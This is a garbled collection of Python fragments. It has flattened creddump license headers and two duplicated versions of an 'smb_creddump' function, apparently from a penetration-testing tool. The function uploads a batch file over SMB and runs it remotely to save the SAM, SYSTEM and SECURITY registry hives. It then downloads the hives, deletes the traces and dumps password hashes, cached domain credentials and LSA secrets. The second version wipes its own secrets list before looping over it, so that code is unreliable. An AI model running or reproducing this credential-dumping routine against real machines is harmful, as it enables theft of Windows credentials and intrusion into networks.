# # creddump is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # creddump is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with creddump. If not, see <http://www.gnu.org/licenses/>. """ @author: Brendan Dolan-Gavitt @license: GNU General Public License 2.0 or later @contact: [email protected] """ import sys from framework.win32.domcachedump import dump_file_hashes if len(sys.argv) < 3: print "usage: %s bootkey <security hive>" % sys.argv[0] sys.exit(1) dump_file_hashes(sys.argv[1].decode("hex"), sys.argv[2])
def smb_creddump():
"""
[-s] <ip> [ user ] [ passwd/nthash ]
Extract SAM, SECURITY, SYSTEM hives and dump SAM, DCC, LSA Secrets
"""
try:
sys.path.insert(0, BASEDIR + '/creddump')
from framework.win32 import hashdump, domcachedump, lsasecrets
except:
text("[!] Error: Creddump dependency missing.", 1)
set_creds(3)
text("[*] Extracting hives...")
tmpfile = '/tmp/cred_run.bat'
bat = ['@echo off', 'cd \\windows\\temp',
'reg save HKLM\\SAM sam.hive /y',
'reg save HKLM\\SYSTEM system.hive /y',
'reg save HKLM\\SECURITY security.hive /y']
open(tmpfile, 'w').write('\r\n'.join(bat))
smbclient('put "%s" "\\windows\\temp\\cred_run.bat"' % tmpfile)
print winexe('\\windows\\temp\\cred_run.bat')
text("[*] Downloading hives...")
smbclient('get "\\windows\\temp\\sam.hive" "%s_sam.hive"' % CONF['smb_ip'])
smbclient('get "\\windows\\temp\\system.hive" "%s_system.hive"' % CONF['smb_ip'])
smbclient('get "\\windows\\temp\\security.hive" "%s_security.hive"' % CONF['smb_ip'])
text("[*] Removing temp files...")
smbclient('del "\\windows\\temp\\cred_run.bat"')
smbclient('del "\\windows\\temp\\sam.hive"')
smbclient('del "\\windows\\temp\\system.hive"')
smbclient('del "\\windows\\temp\\security.hive"')
os.unlink(tmpfile)
text("[*] Extracting SAM credentials...")
hashdump.dump_file_hashes(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_sam.hive')
text("[*] Extracting MSCASH credentials...")
domcachedump.dump_file_hashes(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_security.hive')
# Code below ripped from creddump's lsadump.py
text("[*] Extracting LSA Secrets...")
try:
FILTER = ''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])
secrets = lsasecrets.get_file_secrets(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_security.hive')
if not secrets:
text("[!] Unable to read LSA secrets.")
else:
for k in secrets:
N = 0
length = 16
result = ''
while secrets[k]:
s, secrets[k] = secrets[k][:length],secrets[k][length:]
hexa = ' '.join(["%02X" % ord(x) for x in s])
s = s.translate(FILTER)
result += "%04X %-*s %s\n" % (N, length*3, hexa, s)
N += length
print k
print result
except:
pass
text("[*] SYSTEM, SAM and SECURITY hives were saved in the current directory.")
# You should have received a copy of the GNU General Public License # along with creddump. If not, see <http://www.gnu.org/licenses/>. """ @author: Brendan Dolan-Gavitt @license: GNU General Public License 2.0 or later @contact: [email protected] """ import sys from framework.win32.domcachedump import dump_file_hashes def showUsage(): print "usage: %s <system hive> <security hive> <Vista/7>" % sys.argv[0] print "\nExample (Windows Vista/7):" print "%s /path/to/System32/config/SYSTEM /path/to/System32/config/SECURITY true" % sys.argv[0] print "\nExample (Windows XP):" print "%s /path/to/System32/SYSTEM /path/to/System32/config/SECURITY false" % sys.argv[0] if len(sys.argv) < 4: showUsage() sys.exit(1) if sys.argv[3] not in ["true", "false"]: showUsage() sys.exit(1) vista = True if sys.argv[3] == "true" else False dump_file_hashes(sys.argv[1], sys.argv[2], sys.argv[3])
def smb_creddump():
"""
[-s] <ip/file/range> [ user ] [ passwd/nthash ]
Extract SAM, SECURITY, SYSTEM hives and dump SAM, DCC, LSA Secrets
"""
try:
sys.path.insert(0, BASEDIR + '/creddump')
from framework.win32 import hashdump, domcachedump, lsasecrets
except:
text("[!] Error: Creddump dependency missing.", 1)
set_creds(3)
text("[*] %s Extracting hives..." % (CONF["smb_ip"]))
tmpfile = '/tmp/cred_run.%s.bat' % (CONF["smb_ip"])
bat = [
'@echo off', 'cd \\windows\\temp', 'reg save HKLM\\SAM sam.hive /y',
'reg save HKLM\\SYSTEM system.hive /y',
'reg save HKLM\\SECURITY security.hive /y'
]
open(tmpfile, 'w').write('\r\n'.join(bat))
smbclient('put "%s" "\\windows\\temp\\cred_run.bat"' % tmpfile)
text("[*] %s Running cred_run.bat\n%s\n" %
(CONF["smb_ip"], winexe('\\windows\\temp\\cred_run.bat')))
text("[*] %s Downloading hives..." % (CONF["smb_ip"]))
smbclient('get "\\windows\\temp\\sam.hive" "%s_sam.hive"' % CONF['smb_ip'])
smbclient('get "\\windows\\temp\\system.hive" "%s_system.hive"' %
CONF['smb_ip'])
smbclient('get "\\windows\\temp\\security.hive" "%s_security.hive"' %
CONF['smb_ip'])
text("[*] %s Removing temp files..." % (CONF["smb_ip"]))
smbclient('del "\\windows\\temp\\cred_run.bat"')
smbclient('del "\\windows\\temp\\sam.hive"')
smbclient('del "\\windows\\temp\\system.hive"')
smbclient('del "\\windows\\temp\\security.hive"')
os.unlink(tmpfile)
text("[*] %s Extracting SAM credentials..." % (CONF["smb_ip"]))
hashes = hashdump.dump_file_hashes(CONF['smb_ip'] + '_system.hive',
CONF['smb_ip'] + '_sam.hive')
text("[*] %s Extracting MSCASH credentials..." % (CONF["smb_ip"]))
mscash = domcachedump.dump_file_hashes(CONF['smb_ip'] + '_system.hive',
CONF['smb_ip'] + '_security.hive')
text("[*] %s SAM hashes\n%s" % (CONF["smb_ip"], "\n".join(hashes)))
text("[*] %s MsCash\n%s" % (CONF["smb_ip"], "\n".join(mscash)))
# Code below ripped from creddump's lsadump.py
text("[*] %s Extracting LSA Secrets..." % (CONF["smb_ip"]))
try:
FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.'
for x in range(256)])
secrets = lsasecrets.get_file_secrets(
CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_security.hive')
if not secrets:
text("[!] %s Error(smb_creddump): Unable to read LSA secrets." %
(CONF["smb_ip"]))
else:
secrets = []
for k in secrets:
N = 0
length = 16
result = ''
while secrets[k]:
s, secrets[k] = secrets[k][:length], secrets[k][length:]
hexa = ' '.join(["%02X" % ord(x) for x in s])
s = s.translate(FILTER)
result += "%04X %-*s %s\n" % (N, length * 3, hexa, s)
N += length
secrets.append(k)
secrets.append(result)
text("[*] %s LSA Secrets\n%s" %
(CONF["smb_ip"], "\n".join(secrets)))
except:
pass
text(
"[*] %s SYSTEM, SAM and SECURITY hives were saved in the current directory."
% (CONF["smb_ip"]))
